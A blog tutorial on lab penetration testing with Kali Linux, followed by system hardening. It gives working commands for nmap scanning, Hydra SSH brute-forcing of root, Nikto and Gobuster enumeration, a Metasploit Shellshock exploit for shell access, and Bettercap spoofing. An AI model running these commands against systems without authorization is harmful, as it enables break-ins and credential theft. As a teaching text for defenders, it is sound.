Mastering Local Network Penetration Testing: An Ethical Hacking Guide with Kali Linux

Ethical Hacking & Security Hardening: Penetration Testing in a Local Network Using Kali Linux

Author: Kiran Kumar K
Cybersecurity Analyst | Ethical Hacker | Kali Linux Practitioner


Introduction

As the cybersecurity landscape continues to evolve, proactive system defense is more critical than ever. One of the most effective ways to protect systems is by performing penetration testing within your own network to identify potential vulnerabilities before malicious actors do.

In this blog post, I will walk through a full penetration testing scenario where I test and secure a target device (10.8.56.6) from a Kali Linux machine (10.8.56.1) in the same network. This demonstration is intended to educate cybersecurity professionals and students on how to ethically assess and harden systems.

Disclaimer: This article is for educational purposes only. Always ensure you have permission before testing any system. All examples below were conducted in a safe lab environment with full authorization.


Lab Setup

Device IP Address Description
Kali Linux (Attacker) 10.8.56.1 Used to perform the penetration test
Target System 10.8.56.6 A vulnerable device to test and secure

The process involves four major stages:

  1. Reconnaissance

  2. Enumeration

  3. Exploitation

  4. Remediation and Hardening


Step 1: Reconnaissance

The first phase involves gathering information about the target, such as open ports, running services, and operating system details. For this, we use Nmap, a powerful network scanning tool.

Command:

nmap -sS -sV -O 10.8.56.6

Flags Explained:

  • -sS: TCP SYN scan (stealthy and fast)

  • -sV: Attempts to determine service versions

  • -O: Tries to identify the operating system

Sample Output:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu
80/tcp   open  http    Apache httpd 2.4.18
3306/tcp open  mysql   MySQL 5.7.12

This information tells us that the device is running SSH, a web server (Apache), and a MySQL database. These are potential targets for exploitation.


Step 2: Service Enumeration

Once services are identified, we enumerate them to discover weaknesses, misconfigurations, or vulnerabilities.

SSH (Port 22)

Test for weak or default credentials using Hydra:

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.8.56.6

If the root password is weak, this could allow unauthorized access.

Web Server (Port 80)

We use Nikto to scan for vulnerabilities in the Apache web server:

nikto -h http://10.8.56.6

For deeper analysis, use Gobuster to enumerate directories:

gobuster dir -u http://10.8.56.6 -w /usr/share/wordlists/dirb/common.txt

To manually inspect vulnerabilities like SQL injection, XSS, or insecure file uploads, use Burp Suite to intercept and manipulate HTTP requests.

MySQL (Port 3306)

If the MySQL port is open and credentials are known or default, you can attempt a login:

mysql -h 10.8.56.6 -u root -p

Inside the database, you may find sensitive information or insecure configurations.


Step 3: Exploitation

If a vulnerable version of a service is found, search for publicly available exploits.

Using SearchSploit:

searchsploit apache 2.4.18

Exploiting with Metasploit:

Start Metasploit:

msfconsole

Use a known exploit (example for Apache):

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST 10.8.56.6
set TARGETURI /
run

Once exploitation is successful, you may obtain shell access to the device.

Post-exploitation actions could include checking for privilege escalation opportunities, system misconfigurations, and sensitive files.


Step 4: Securing the Target Device

After identifying vulnerabilities, it is essential to secure the target system against potential attacks. Below are the recommended hardening techniques.

1. Disable Unnecessary Services

Stop services like Telnet, FTP, or SMB if not required:

sudo systemctl disable telnet

2. Change Default Passwords

Ensure that all user and database accounts use strong, unique passwords.

3. Configure a Firewall (UFW Example)

sudo apt install ufw
sudo ufw default deny incoming
sudo ufw allow 22
sudo ufw enable

Allow only the necessary ports and block the rest.

4. Install Fail2Ban

Protect against brute-force attacks:

sudo apt install fail2ban
sudo systemctl enable fail2ban

5. Regular Updates

Always keep the system and services up to date:

sudo apt update && sudo apt upgrade

Patch known vulnerabilities as soon as security updates are available.


Optional: Man-in-the-Middle (MitM) Simulation

If both devices are on the same subnet, you can test ARP spoofing or DNS spoofing using tools like Ettercap or Bettercap:

bettercap -iface eth0

Use this to inspect traffic and identify unsecured protocols.


Summary of Tools Used

Task Tool Description
Port Scanning Nmap Identifies open ports and OS
Service Enumeration Nikto, Gobuster, Hydra Analyzes services and brute-force
Web App Testing Burp Suite Manual vulnerability testing
Exploitation Metasploit, SearchSploit Executes known exploits
Hardening UFW, Fail2Ban Secures the target post-assessment

Final Thoughts

By thinking like an attacker, cybersecurity professionals can proactively discover and patch system vulnerabilities before they are exploited. This hands-on approach using Kali Linux provides a clear understanding of how attackers work — and more importantly, how to defend against them.

Understanding penetration testing is not about destruction — it's about building stronger defenses, writing better code, and protecting user data.


About the Author

Kiran Kumar K
Cybersecurity Analyst | Ethical Hacker | Linux Enthusiast
GitHub: github.com/KIRAN-KUMAR-K3
LinkedIn: linkedin.com/in/kiran-kumar-k3


Next Post Previous Post
No Comment
Add Comment
comment url